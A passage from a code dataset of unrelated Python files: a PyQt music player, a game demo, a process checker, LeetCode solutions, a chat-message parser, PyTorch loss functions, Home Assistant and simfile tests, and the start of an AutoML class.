entry[1]\n current: int = entry[2]\n # print(\"Add : {}\".format(music.path))\n self.progress_dialog.show()\n if total < 300 or current % 3 == 0:\n self.progress_dialog.setMaximum(total)\n self.progress_dialog.setValue(current)\n self.progress_dialog.setLabelText(music.path.stem + music.path.suffix)\n # if any([x.path == music.path for x in self.my_playlist.musics()]):\n # return\n row = self.playlist_widget.rowCount()\n self.playlist_widget.setSortingEnabled(False)\n self.playlist_widget.insertRow(row)\n self.playlist_widget.setItem(row, 0, QTableWidgetItem(music.artist))\n self.playlist_widget.setItem(row, 1, QTableWidgetItem(music.title))\n self.playlist_widget.setItem(row, 2, QTableWidgetItem(\n '{:02d}:{:02d}'.format(music.duration // 60000, music.duration // 1000 % 60)))\n self.playlist_widget.item(row, 0).setData(Qt.UserRole, music)\n # print(\"current: {}, last: {}\".format(music.title, last_music.title))\n self.my_playlist.add_music(music)\n if current == total:\n self.progress_dialog.setValue(total)\n self.playlist_widget.scrollToBottom()\n self.playlist_widget.setSortingEnabled(True)\n last_music: MusicEntry = self.playlist_widget.item(current - 1, 0).data(Qt.UserRole)\n print(\"current: {}, last: {}\".format(music.title, last_music.title))\n self.on_sort_ended()\n\n def dbl_clicked(self, item: QModelIndex):\n self.my_playlist.set_current_index(item.row())\n self.my_playlist.play()\n\n def setup_layout(self):\n self.play_button = self.generate_tool_button('media-playback-start')\n self.prev_button = self.generate_tool_button('media-skip-backward')\n self.next_button = self.generate_tool_button('media-skip-forward')\n self.playback_mode_button = self.generate_tool_button('media-playlist-shuffle')\n self.progress_slider = MyQSlider(Qt.Horizontal, self)\n self.progress_label = QLabel('00:00/00:00', self)\n self.volume_dial = QDial(self)\n 
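calc_current_lyric_index in the record above locates the active lyric line with a linear scan over the sorted timestamps. Since the list is already sorted, the same lookup could also be phrased with bisect; a sketch under that assumption, not the record's actual code:

import bisect

times = [0, 12340, 58100, 65000]  # sorted lyric timestamps in milliseconds

def lyric_index(position_ms):
    # rightmost timestamp <= position_ms, clamped to the first line
    return max(bisect.bisect_right(times, position_ms) - 1, 0)

assert lyric_index(0) == 0
assert lyric_index(60000) == 2   # between 58100 and 65000
assert lyric_index(999999) == 3  # past the last tag: stay on the last line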
self.volume_dial.setFixedSize(50, 50)\n self.playlist_widget = QTableWidget(0, 3, self)\n self.playlist_widget.setHorizontalHeaderLabels(('Artist', 'Title', 'Duration'))\n self.playlist_widget.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.playlist_widget.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.playlist_widget.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.playlist_widget.horizontalHeader().setSortIndicator(0, Qt.AscendingOrder)\n self.playlist_widget.horizontalHeader().sectionClicked.connect(self.on_sort_ended)\n self.playlist_widget.setContextMenuPolicy(Qt.CustomContextMenu)\n self.playlist_widget.customContextMenuRequested.connect(self.on_request_context_menu)\n self.lyric_wrapper = QScrollArea(self)\n self.lyric_label = MyQLabel('
<center>Hello, World!</center>
')\n font = self.lyric_label.font()\n font.setPointSize(14)\n self.lyric_label.setFont(font)\n self.lyric_wrapper.setWidget(self.lyric_label)\n self.lyric_wrapper.setWidgetResizable(True)\n self.lyric_wrapper.verticalScrollBar().hide()\n self.init_progress_dialog()\n\n content_layout = QHBoxLayout()\n content_layout.addWidget(self.playlist_widget, 1)\n content_layout.addWidget(self.lyric_wrapper, 1)\n\n controller_layout = QHBoxLayout()\n controller_layout.addWidget(self.play_button)\n controller_layout.addWidget(self.prev_button)\n controller_layout.addWidget(self.next_button)\n controller_layout.addWidget(self.progress_slider)\n controller_layout.addWidget(self.progress_label)\n controller_layout.addWidget(self.playback_mode_button)\n controller_layout.addWidget(self.volume_dial)\n\n root_layout = QVBoxLayout(self)\n root_layout.addLayout(content_layout)\n root_layout.addLayout(controller_layout)\n self.setLayout(root_layout)\n self.resize(888, 666)\n self.setAcceptDrops(True)\n\n def on_request_context_menu(self):\n print(\"Requesting...\")\n menu = QMenu()\n menu.addAction(\"Delete\")\n menu.triggered.connect(self.remove_music)\n menu.exec(QCursor.pos())\n menu.clear()\n\n def remove_music(self):\n current_index = self.my_playlist.current_index()\n playing = self.my_playlist.is_playing()\n indices = sorted(list(set([x.row() for x in self.playlist_widget.selectedIndexes()])), reverse=True)\n for index in indices:\n self.my_playlist.remove_music(index)\n self.playlist_widget.removeRow(index)\n print(\"Removing index={}, currentIndex={}\".format(index, current_index))\n self.config.persist()\n if current_index in indices:\n if self.my_playlist.music_count() > 0:\n self.my_playlist.next()\n else:\n self.my_playlist.set_current_index(-1)\n if playing:\n self.my_playlist.play()\n\n def init_progress_dialog(self):\n self.progress_dialog = QProgressDialog(self)\n # noinspection PyTypeChecker\n self.progress_dialog.setCancelButton(None)\n self.progress_dialog.setWindowTitle(\"Loading music\")\n self.progress_dialog.setFixedSize(444, 150)\n self.progress_dialog.setModal(True)\n self.progress_dialog.setValue(100)\n\n def on_sort_ended(self):\n self.my_playlist.clear()\n for row in range(self.playlist_widget.rowCount()):\n music: MusicEntry = self.playlist_widget.item(row, 0).data(Qt.UserRole)\n self.my_playlist.add_music(music)\n self.config.playlist = self.my_playlist.musics()\n self.config.sortBy = {0: 'ARTIST', 1: 'TITLE', 2: 'DURATION'}[\n self.playlist_widget.horizontalHeader().sortIndicatorSection()]\n self.config.sortOrder = 'ASCENDING' if \\\n self.playlist_widget.horizontalHeader().sortIndicatorOrder() == Qt.AscendingOrder else 'DESCENDING'\n self.config.persist()\n\n def resizeEvent(self, a0: QtGui.QResizeEvent) -> None:\n super().resizeEvent(a0)\n if self.lyric:\n self.prev_lyric_index = -1\n self.refresh_lyric()\n\n def dragEnterEvent(self, event: QtGui.QDragEnterEvent) -> None:\n if event.mimeData().hasUrls():\n event.accept()\n\n def dropEvent(self, event: QtGui.QDropEvent) -> None:\n urls: List[QUrl] = event.mimeData().urls()\n paths = [pathlib.Path(x.path()) for x in urls if self.mime_db.mimeTypeForUrl(x).name().startswith('audio/')]\n self.load_playlist_task.music_files = paths\n self.load_playlist_task.start()\n self.init_progress_dialog()\n\n\ndef main():\n app = QApplication(sys.argv)\n app.setApplicationName('Rawsteel Music Player')\n app.setApplicationDisplayName('Rawsteel Music Player')\n app.setWindowIcon(QIcon.fromTheme('audio-headphones'))\n window = PlayerWindow()\n 
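Worth noting how MyPlaylist, earlier in this record, makes previous() meaningful in shuffle mode: every random pick is memoised in a _history dict keyed by a moving index, so stepping back replays earlier picks instead of re-rolling. A stripped-down sketch of that mechanism with shortened, hypothetical names:

import random

class ShuffleHistory:
    """Replayable random order: step(+1) rolls fresh picks, step(-1) rewinds."""

    def __init__(self, count):
        self.count = count
        self.history = {}  # position in the walk -> chosen track index
        self.pos = -1

    def _roll(self, avoid):
        # re-roll so two consecutive picks differ, as _next_random_index does
        idx = random.randrange(self.count)
        while self.count > 1 and idx == avoid:
            idx = random.randrange(self.count)
        return idx

    def step(self, direction):
        current = self.history.get(self.pos)
        self.pos += direction
        if self.pos not in self.history:
            self.history[self.pos] = self._roll(avoid=current)
        return self.history[self.pos]

h = ShuffleHistory(5)
first, second = h.step(+1), h.step(+1)
assert h.step(-1) == first  # stepping back replays the earlier pick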
window.show()\n try:\n app.exec()\n except Exception as e:\n print(\"Exception\", e)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"rawsteelp/rawsteelp.py","file_name":"rawsteelp.py","file_ext":"py","file_size_in_byte":27762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610492349","text":"from player import Player\nfrom enemy import Enemy, Troll, Vampyre, VampyreKing\n\n\nplayer_1 = Player(\"Tadhg\")\n\nzombie = Enemy(\"Zombie\", 5, 1)\nprint(zombie)\n\n# zombie.take_damage(4)\n# print(zombie)\n#\n# zombie.take_damage(1)\n# print(zombie)\n#\n# zombie.take_damage(6)\n# print(zombie)\n\n# instantiating a subclass method\n# troll_1 = Troll(\"Og\")\n# print(troll_1)\n#\n# troll_2 = Enemy(\"Bog\", 10, 1)\n# print(troll_2)\n#\n# # using a subclasses methods\n# troll_1.grunt()\n#\n# # as troll 2 is not a Troll object it cannot use the sub classes methods\n# # troll_2.grunts()\n#\n# Dr_Acula = Vampyre(\"Dr. Acula\")\n# print(Dr_Acula)\n#\n# # subclass using superclasses methods\n# troll_1.take_damage(10)\n# print(troll_1)\n\n# Dr_Acula.take_damage(13)\n# print(Dr_Acula)\n\nprint(\"=\" * 40)\n\n# while Dr_Acula.alive:\n# Dr_Acula.take_damage(1)\n# print(Dr_Acula)\n\nVampKing = VampyreKing(\"Vampyre King\")\nprint(VampKing)\n\nVampKing.take_damage(17)\nprint(VampKing)\n","sub_path":"ObjectOrientedPorgramming/Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"104013954","text":"#!/usr/bin/env python3\n# Author: Robert Freiberger\n# Title: process_check.py\n# Notes: A simple test of subprocess and testing\n# Date: 1/20/2017\n# Repo:\n# License: BSD\n\nimport subprocess\n\n\ndef decoder(coded_string):\n return coded_string.decode('UTF-8')\n\n\ndef command_run(command):\n results = subprocess.Popen(\n command,\n shell=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n stdout_value, stderr_value = results.communicate()\n if stderr_value:\n print(\"### Error Output ###\")\n print(decoder(stderr_value))\n print(\"### Error Output ###\")\n else:\n return decoder(stdout_value)\n\n\ndef level_range(current_value, max_value):\n percent_value = int(100 * (current_value / max_value))\n if percent_value >= 0 and percent_value <= 25:\n return_message = \"Value is near zero\"\n elif percent_value >= 26 and percent_value <= 50:\n return_message = \"Value is low\"\n elif percent_value >= 51 and percent_value <= 75:\n return_message = \"Value is medium\"\n elif percent_value >= 76 and percent_value <= 100:\n return_message = \"Value is high\"\n return return_message\n\n\ndef level_alert(current_value, max_value):\n ## Alerts when current value is above max value\n if current_value >= max_value:\n return \"Alert!!! 
- threshold passed!!!\"\n else:\n return \"Value below alerting threhold.\"\n\n# Define the commands and alerts\ncmd_results = int((command_run('ps aux | grep root | wc -l')))\nprint(level_range(cmd_results, 200))\nprint(level_alert(cmd_results, 200))\n","sub_path":"SimpleTest2/process_check.py","file_name":"process_check.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"499697239","text":"# Definition for a binary tree node\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n # @param root, a tree node\r\n # @return an integer\r\n def minDepth(self, root, dist=1):\r\n if not root: return 0\r\n if not root.left and not root.right: return dist\r\n if not root.left: return self.minDepth(root.right, dist+1)\r\n if not root.right: return self.minDepth(root.left, dist+1)\r\n return min(self.minDepth(root.left, dist+1), self.minDepth(root.right, dist+1))","sub_path":"leetcode_111.py","file_name":"leetcode_111.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"486410435","text":"# brilliant!!!\n\nclass Solution:\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n\n if not nums:\n return\n\n zero = 0\n for i in range(len(nums)):\n # print(zero, i, nums)\n if nums[i] != 0:\n nums[i], nums[zero] = nums[zero], nums[i]\n zero += 1\n\n\nn = [1, 0, 1, 0, 3, 12]\ns = Solution()\ns.moveZeroes(n)\nprint(n)\n","sub_path":"python/283. Move Zeroes-concise.py","file_name":"283. Move Zeroes-concise.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"409608666","text":"import json\njfin = []\ndata = open('mepointize.data','r')\nx = []\ny = []\nunparseddata = data.readlines()\n\nfor datalet in unparseddata:\n try:\n i,j = datalet.split(',')\n x.append(float(i))\n y.append(float(j))\n except:\n print(\"MESSED\" , datalet)\nprint(type(i))\n\nfor _ in range(len(x)):\n a,b = x[_],y[_]\n jdat = json.dumps({\n 'x':a ,\n 'y':b\n })\n jfin.append(jdat)\n\nprint(jfin[0])\njfile = open(\"jsondata.json\",'w')\n\njfile.write('{')\nc = 0;\nfor jl in jfin:\n jfile.write(f'\"{c}\":')\n jfile.write(jl)\n jfile.write(',')\n c+=1\njfile.write('}')","sub_path":"fourierCirclesRE/parsedata.py","file_name":"parsedata.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"471562916","text":"\"\"\"\nThe omc3 library\n~~~~~~~~~~~~~~~~\n\nomc3 is a tool package for the optics measurements and corrections group (OMC) at CERN.\n\n:copyright: pyLHC/OMC-Team working group.\n:license: MIT, see the LICENSE file for details.\n\"\"\"\n\n__title__ = \"omc3\"\n__description__ = \"An accelerator physics tools package for the OMC team at CERN.\"\n__url__ = \"https://github.com/pylhc/omc3\"\n__version__ = \"0.11.1\"\n__author__ = \"pylhc\"\n__author_email__ = \"pylhc@github.com\"\n__license__ = \"MIT\"\n\n__all__ = [__version__]\n","sub_path":"omc3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"213025764","text":"import re\nfrom typing import Iterable, Dict, 
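The moveZeroes record above hinges on one invariant: zero always marks the leftmost slot that may still hold a zero, so each swap drops a non-zero element into its final relative position in a single pass. A quick property check of that claim; the test data is invented:

import random

def move_zeroes(nums):
    zero = 0  # boundary: everything left of it is non-zero, order preserved
    for i in range(len(nums)):
        if nums[i] != 0:
            nums[i], nums[zero] = nums[zero], nums[i]
            zero += 1

for _ in range(1000):
    nums = [random.choice([0, 0, 1, 2, 3]) for _ in range(random.randrange(10))]
    expected = [x for x in nums if x != 0] + [0] * nums.count(0)
    move_zeroes(nums)
    assert nums == expected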
Tuple, Any\n\n\ndef escape(s: str, *, escape_comma: bool = True) -> str:\n s = s.replace('&', '&') \\\n .replace('[', '[') \\\n .replace(']', ']')\n if escape_comma:\n s = s.replace(',', ',')\n return s\n\n\ndef unescape(s: str) -> str:\n return s.replace(',', ',') \\\n .replace('[', '[') \\\n .replace(']', ']') \\\n .replace('&', '&')\n\n\ndef _b2s(b: bool):\n if b:\n return '1'\n else:\n return '0'\n\n\nclass MessageSegment(dict):\n def __init__(self, d: Dict[str, Any] = None, *,\n type: str = None, data: Dict[str, str] = None):\n super().__init__()\n if isinstance(d, dict) and d.get('type'):\n self.update(d)\n elif type:\n self['type'] = type\n self['data'] = data or {}\n else:\n raise ValueError('the \"type\" field cannot be None or empty')\n\n def __getitem__(self, item):\n if item not in ('type', 'data'):\n raise KeyError(f'the key \"{item}\" is not allowed')\n return super().__getitem__(item)\n\n def __setitem__(self, key, value):\n if key not in ('type', 'data'):\n raise KeyError(f'the key \"{key}\" is not allowed')\n return super().__setitem__(key, value)\n\n def __delitem__(self, key):\n raise NotImplementedError\n\n def __getattr__(self, item):\n try:\n return self.__getitem__(item)\n except KeyError:\n raise AttributeError(f'the attribute \"{item}\" is not allowed')\n\n def __setattr__(self, key, value):\n try:\n return self.__setitem__(key, value)\n except KeyError:\n raise AttributeError(f'the attribute \"{key}\" is not allowed')\n\n def __str__(self):\n if self.type == 'text':\n return escape(self.data.get('text', ''), escape_comma=False)\n\n params = ','.join(('{}={}'.format(k, escape(str(v)))\n for k, v in self.data.items()))\n if params:\n params = ',' + params\n return '[CQ:{type}{params}]'.format(type=self.type, params=params)\n\n def __eq__(self, other):\n if not isinstance(other, MessageSegment):\n return False\n return self.type == other.type and self.data == other.data\n\n @staticmethod\n def text(text: str):\n return MessageSegment(type='text', data={'text': text})\n\n @staticmethod\n def emoji(id_: int):\n return MessageSegment(type='emoji', data={'id': str(id_)})\n\n @staticmethod\n def face(id_: int):\n return MessageSegment(type='face', data={'id': str(id_)})\n\n @staticmethod\n def image(file: str):\n return MessageSegment(type='image', data={'file': file})\n\n @staticmethod\n def record(file: str, magic: bool = False):\n return MessageSegment(type='record',\n data={'file': file, 'magic': _b2s(magic)})\n\n @staticmethod\n def at(user_id: int):\n return MessageSegment(type='at', data={'qq': str(user_id)})\n\n @staticmethod\n def rps():\n return MessageSegment(type='rps')\n\n @staticmethod\n def dice():\n return MessageSegment(type='dice')\n\n @staticmethod\n def shake():\n return MessageSegment(type='shake')\n\n @staticmethod\n def anonymous(ignore_failure: bool = False):\n return MessageSegment(type='anonymous',\n data={'ignore': _b2s(ignore_failure)})\n\n @staticmethod\n def share(url: str, title: str, content: str = '', image_url: str = ''):\n return MessageSegment(type='share', data={\n 'url': url,\n 'title': title,\n 'content': content,\n 'image': image_url\n })\n\n @staticmethod\n def contact_user(id_: int):\n return MessageSegment(type='contact',\n data={'type': 'qq', 'id': str(id_)})\n\n @staticmethod\n def contact_group(id_: int):\n return MessageSegment(type='contact',\n data={'type': 'group', 'id': str(id_)})\n\n @staticmethod\n def location(latitude: float, longitude: float, title: str = '',\n content: str = ''):\n return 
MessageSegment(type='location', data={\n 'lat': str(latitude),\n 'lon': str(longitude),\n 'title': title,\n 'content': content\n })\n\n @staticmethod\n def music(type_: str, id_: int):\n return MessageSegment(type='music',\n data={'type': type_, 'id': str(id_)})\n\n @staticmethod\n def music_custom(url: str, audio_url: str, title: str, content: str = '',\n image_url: str = ''):\n return MessageSegment(type='music', data={\n 'type': 'custom',\n 'url': url,\n 'audio': audio_url,\n 'title': title,\n 'content': content,\n 'image': image_url\n })\n\n\nclass Message(list):\n def __init__(self, msg: Any = None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n try:\n if isinstance(msg, (list, str)):\n self.extend(msg)\n elif isinstance(msg, dict):\n self.append(msg)\n return\n except:\n pass\n raise ValueError('the msg argument is not recognizable')\n\n @staticmethod\n def _split_iter(msg_str: str) -> Iterable[MessageSegment]:\n def iter_function_name_and_extra() -> Iterable[Tuple[str, str]]:\n text_begin = 0\n for cqcode in re.finditer(r'\\[CQ:(?P[a-zA-Z0-9-_.]+)'\n r'(?P'\n r'(?:,[a-zA-Z0-9-_.]+=?[^,\\]]*)*'\n r'),?\\]',\n msg_str):\n yield 'text', unescape(\n msg_str[text_begin:cqcode.pos + cqcode.start()])\n text_begin = cqcode.pos + cqcode.end()\n yield cqcode.group('type'), cqcode.group('params').lstrip(',')\n yield 'text', unescape(msg_str[text_begin:])\n\n for function_name, extra in iter_function_name_and_extra():\n if function_name == 'text':\n if extra:\n # only yield non-empty text segment\n yield MessageSegment(type=function_name,\n data={'text': extra})\n else:\n data = {k: v for k, v in map(\n lambda x: x.split('=', maxsplit=1),\n filter(lambda x: x, (x.lstrip() for x in extra.split(',')))\n )}\n yield MessageSegment(type=function_name, data=data)\n\n def __str__(self):\n return ''.join((str(seg) for seg in self))\n\n def __add__(self, other: Any):\n result = Message(self)\n try:\n if isinstance(other, Message):\n result.extend(other)\n elif isinstance(other, MessageSegment):\n result.append(other)\n elif isinstance(other, list):\n result.extend(map(lambda d: MessageSegment(d), other))\n elif isinstance(other, dict):\n result.append(MessageSegment(other))\n elif isinstance(other, str):\n result.extend(Message._split_iter(other))\n return result\n except:\n pass\n raise ValueError('the addend is not a valid message')\n\n def append(self, obj: Any) -> None:\n try:\n if isinstance(obj, MessageSegment):\n if self and self[-1].type == 'text' and obj.type == 'text':\n self[-1].data['text'] += obj.data['text']\n elif obj.type != 'text' or obj.data['text'] or not self:\n super().append(obj)\n else:\n self.append(MessageSegment(obj))\n return\n except:\n pass\n raise ValueError('the object is not a valid message segment')\n\n def extend(self, msg: Any) -> None:\n try:\n if isinstance(msg, str):\n msg = self._split_iter(msg)\n\n for seg in msg:\n self.append(seg)\n return\n except:\n pass\n raise ValueError('the object is not a valid message')\n\n def reduce(self) -> None:\n \"\"\"\n Remove redundant segments.\n\n Since this class is implemented based on list,\n this method may require O(n) time.\n \"\"\"\n idx = 0\n while idx < len(self):\n if idx > 0 and \\\n self[idx - 1].type == 'text' and self[idx].type == 'text':\n self[idx - 1].data['text'] += self[idx].data['text']\n del self[idx]\n else:\n idx += 1\n\n def extract_plain_text(self, reduce: bool = False) -> str:\n \"\"\"\n Extract text segments from the message, joined by single space.\n\n :param reduce: reduce the message 
before extracting\n :return: the joined string\n \"\"\"\n if reduce:\n self.reduce()\n\n result = ''\n for seg in self:\n if seg.type == 'text':\n result += ' ' + seg.data['text']\n if result:\n result = result[1:]\n return result\n","sub_path":"aiocqhttp/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":9329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"275840798","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.nn import functional as F\r\nimport numpy as np\r\n\r\n\r\nclass CrossEntropy(nn.Module):\r\n def __init__(self, para_dict=None):\r\n super(CrossEntropy, self).__init__()\r\n\r\n def forward(self, output, target):\r\n loss = F.cross_entropy(output, target)\r\n return loss\r\n\r\n\r\nclass FocalLoss(nn.Module):\r\n def __init__(self, para_dict=None):\r\n super(FocalLoss, self).__init__()\r\n cfg = para_dict[\"cfg\"]\r\n # self.gamma = cfg.LOSS.FOCAL.GAMMA\r\n self.gamma = 1\r\n assert self.gamma >= 0\r\n\r\n def focal_loss(self, input_values):\r\n \"\"\"Computes the focal loss\"\"\"\r\n p = torch.exp(-input_values)\r\n loss = (1 - p) ** self.gamma * input_values\r\n return loss.mean()\r\n\r\n def forward(self, input, target):\r\n return self.focal_loss(F.cross_entropy(input, target, reduction='none'))\r\n\r\n\r\n# The LDAMLoss class is copied from the official PyTorch implementation in LDAM (https://github.com/kaidic/LDAM-DRW).\r\nclass LDAMLoss(nn.Module):\r\n def __init__(self, para_dict=None):\r\n super(LDAMLoss, self).__init__()\r\n s = 30\r\n self.num_class_list = para_dict[\"num_class_list\"]\r\n self.device = para_dict[\"device\"]\r\n\r\n cfg = para_dict[\"cfg\"]\r\n max_m = cfg.LOSS.LDAM.MAX_MARGIN\r\n m_list = 1.0 / np.sqrt(np.sqrt(self.num_class_list))\r\n m_list = m_list * (max_m / np.max(m_list))\r\n m_list = torch.FloatTensor(m_list).to(self.device)\r\n self.m_list = m_list\r\n assert s > 0\r\n self.s = s\r\n\r\n def forward(self, x, target):\r\n index = torch.zeros_like(x, dtype=torch.uint8)\r\n index.scatter_(1, target.data.view(-1, 1), 1)\r\n\r\n index_float = index.type(torch.FloatTensor)\r\n index_float = index_float.to(self.device)\r\n batch_m = torch.matmul(self.m_list[None, :], index_float.transpose(0, 1))\r\n batch_m = batch_m.view((-1, 1))\r\n x_m = x - batch_m\r\n\r\n output = torch.where(index, x_m, x)\r\n\r\n return F.cross_entropy(self.s * output, target)\r\n\r\n\r\n","sub_path":"lib/loss/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"529992745","text":"import unittest\n\nfrom .helpers import *\nfrom .. 
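The LDAMLoss record above derives per-class margins proportional to 1 / n_j**(1/4) and rescales them so the rarest class receives exactly max_m; the margin is then subtracted from that class's logit, pushing rarer classes further from the decision boundary. A worked numeric check with made-up class counts:

import numpy as np

num_class_list = [1000, 100, 10]  # hypothetical per-class sample counts
max_m = 0.5                       # plays the role of cfg.LOSS.LDAM.MAX_MARGIN

m_list = 1.0 / np.sqrt(np.sqrt(num_class_list))  # margins ~ 1 / n_j**(1/4)
m_list = m_list * (max_m / np.max(m_list))       # rescale: rarest class -> max_m

print(np.round(m_list, 4))  # ~ [0.1581 0.2812 0.5]: the 10-sample class gets the full margin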
import *\nfrom ..timed import timed_note_iterator\nfrom ...timing import Beat, TimingData\n\n\nclass TestTimedNoteStream(unittest.TestCase):\n def test_timed_note_stream(self):\n timed_notes = list(timed_note_iterator(\n note_data=NoteData.from_chart(testing_chart()),\n timing_data=TimingData.from_simfile(testing_simfile()),\n ))\n\n self.assertAlmostEqual(4.000, timed_notes[0].time)\n self.assertEqual(\n Note(beat=Beat(16,4), column=0, note_type=NoteType.TAP),\n timed_notes[0].note\n )\n self.assertAlmostEqual(4.250, timed_notes[1].time)\n self.assertEqual(\n Note(beat=Beat(18,4), column=2, note_type=NoteType.TAP),\n timed_notes[1].note\n )\n self.assertAlmostEqual(9.000, timed_notes[-1].time)\n self.assertEqual(\n Note(beat=Beat(48,4), column=3, note_type=NoteType.TAIL),\n timed_notes[-1].note\n )\n","sub_path":"simfile/notes/tests/test_timed.py","file_name":"test_timed.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127420179","text":"\"\"\"The tests for the Sure Petcare binary sensor platform.\"\"\"\nfrom homeassistant.components.surepetcare.const import DOMAIN\nfrom homeassistant.setup import async_setup_component\n\nfrom . import MOCK_API_DATA, MOCK_CONFIG, _patch_sensor_setup\n\nEXPECTED_ENTITY_IDS = {\n \"binary_sensor.pet_flap_pet_flap_connectivity\": \"household-id-13576-connectivity\",\n \"binary_sensor.pet_flap_cat_flap_connectivity\": \"household-id-13579-connectivity\",\n \"binary_sensor.feeder_feeder_connectivity\": \"household-id-12345-connectivity\",\n \"binary_sensor.pet_pet\": \"household-id-24680\",\n \"binary_sensor.hub_hub\": \"household-id-hub-id\",\n}\n\n\nasync def test_binary_sensors(hass, surepetcare) -> None:\n \"\"\"Test the generation of unique ids.\"\"\"\n instance = surepetcare.return_value\n instance.data = MOCK_API_DATA\n instance.get_data.return_value = MOCK_API_DATA\n\n with _patch_sensor_setup():\n assert await async_setup_component(hass, DOMAIN, MOCK_CONFIG)\n await hass.async_block_till_done()\n\n entity_registry = await hass.helpers.entity_registry.async_get_registry()\n state_entity_ids = hass.states.async_entity_ids()\n\n for entity_id, unique_id in EXPECTED_ENTITY_IDS.items():\n assert entity_id in state_entity_ids\n entity = entity_registry.async_get(entity_id)\n assert entity.unique_id == unique_id\n","sub_path":"tests/components/surepetcare/test_binary_sensor.py","file_name":"test_binary_sensor.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275439208","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"Automated Tool for Optimized Modelling (ATOM).\r\n\r\nAuthor: Mavs\r\nDescription: Module containing the ATOM class.\r\n\r\n\"\"\"\r\n\r\n# Standard packages\r\nimport os\r\nimport contextlib\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy import stats\r\nfrom copy import deepcopy\r\nfrom typeguard import typechecked\r\nfrom typing import Union, Optional, Any\r\n\r\n# Own modules\r\nfrom .branch import Branch\r\nfrom .basepredictor import BasePredictor\r\nfrom .basetrainer import BaseTrainer\r\nfrom .basetransformer import BaseTransformer\r\nfrom .nlp import TextCleaner, Tokenizer, Normalizer, Vectorizer\r\nfrom .pipeline import Pipeline\r\nfrom .data_cleaning import (\r\n DropTransformer,\r\n FuncTransformer,\r\n Cleaner,\r\n Gauss,\r\n Scaler,\r\n Imputer,\r\n Encoder,\r\n Pruner,\r\n Balancer,\r\n)\r\nfrom .feature_engineering import 
FeatureGenerator, FeatureSelector\r\nfrom .training import (\r\n DirectClassifier,\r\n DirectRegressor,\r\n SuccessiveHalvingClassifier,\r\n SuccessiveHalvingRegressor,\r\n TrainSizingClassifier,\r\n TrainSizingRegressor,\r\n)\r\nfrom .models import CustomModel\r\nfrom .plots import ATOMPlotter\r\nfrom .utils import (\r\n SCALAR, SEQUENCE_TYPES, X_TYPES, Y_TYPES, DISTRIBUTIONS, flt,\r\n lst, divide, infer_task, check_method, check_scaling,\r\n check_multidimensional, names_from_estimator, variable_return,\r\n delete, custom_transform, add_transformer, method_to_log,\r\n composed, crash, CustomDict,\r\n)\r\n\r\n\r\nclass ATOM(BasePredictor, ATOMPlotter):\r\n \"\"\"ATOM base class.\r\n\r\n The ATOM class is a convenient wrapper for all data cleaning,\r\n feature engineering and trainer estimators in this package.\r\n Provide the dataset to the class, and apply all transformations\r\n and model management from here.\r\n\r\n Warning: This class should not be called directly. Use descendant\r\n classes ATOMClassifier or ATOMRegressor instead.\r\n\r\n \"\"\"\r\n\r\n @composed(crash, method_to_log)\r\n def __init__(self, arrays, y, shuffle, n_rows, test_size):\r\n self.shuffle = shuffle\r\n self.n_rows = n_rows\r\n self.test_size = test_size\r\n self.missing = [\"\", \"?\", \"NA\", \"nan\", \"NaN\", \"None\", \"inf\"]\r\n\r\n # Branching attributes\r\n self._branches = {\"og\": Branch(self, \"og\"), \"master\": Branch(self, \"master\")}\r\n self._current = \"master\" # Main branch\r\n\r\n # Training attributes\r\n self._models = CustomDict()\r\n self._metric = CustomDict()\r\n self.errors = {}\r\n\r\n self.log(\"<< ================== ATOM ================== >>\", 1)\r\n\r\n # Prepare the provided data\r\n self.branch.data, self.branch.idx = self._get_data_and_idx(arrays, y=y)\r\n\r\n # Attach the data to the original branch\r\n self.og.data = self.branch.data.copy(deep=True)\r\n self.og.idx = self.branch.idx.copy()\r\n\r\n # Save the test_size fraction for use during training\r\n self._test_size = self.branch.idx[1] / len(self.dataset)\r\n\r\n self.task = infer_task(self.y, goal=self.goal)\r\n self.log(f\"Algorithm task: {self.task}.\", 1)\r\n if self.n_jobs > 1:\r\n self.log(f\"Parallel processing with {self.n_jobs} cores.\", 1)\r\n\r\n # Assign mapping\r\n try: # Can fail if str and NaN in target column\r\n classes = sorted(self.y.unique())\r\n except TypeError:\r\n classes = self.y.unique()\r\n self.branch.mapping = {str(value): 